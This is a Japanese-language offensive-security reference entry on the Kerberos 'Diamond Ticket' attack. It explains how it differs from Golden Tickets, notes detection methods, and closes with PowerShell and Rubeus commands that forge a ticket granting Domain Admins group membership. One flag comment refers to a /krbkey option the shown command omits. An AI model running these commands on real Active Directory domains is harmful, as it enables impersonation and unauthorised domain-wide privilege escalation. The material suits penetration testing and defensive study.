ダイヤモンドチケット

ゴールデンチケットのように、ダイヤモンドチケットは任意のユーザーとして任意のサービスにアクセスできるTGTです。 ゴールデンチケットは完全にオフラインで偽造され、そのドメインのkrbtgtハッシュで暗号化され、その後使用するためにログオンセッションに渡されます。 ドメインコントローラは、正当に発行されたTGTを追跡しないため、自分自身のkrbtgtハッシュで暗号化されたTGTを喜んで受け入れます。

ゴールデンチケットの使用を検出するための2つの一般的な技術があります：

• 対応するAS-REQがないTGS-REQを検索します。

• Mimikatzのデフォルトの10年間有効期限など、ばかげた値を持つTGTを検索します。

ダイヤモンドチケットは、DCによって発行された正当なTGTのフィールドを変更して作成されます。 これは、TGTを要求し、ドメインのkrbtgtハッシュで復号し、チケットの必要なフィールドを変更してから再度暗号化することによって達成されます。 これにより、ダイヤモンドチケットは、ゴールデンチケットの2つの前述の欠点を克服します：

• TGS-REQには前のAS-REQがあります。

• TGTはDCによって発行されたものであり、ドメインのKerberosポリシーのすべての正しい詳細を持っています。 ゴールデンチケットでこれらを正確に偽造することができますが、より複雑でミスの可能性があります。

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.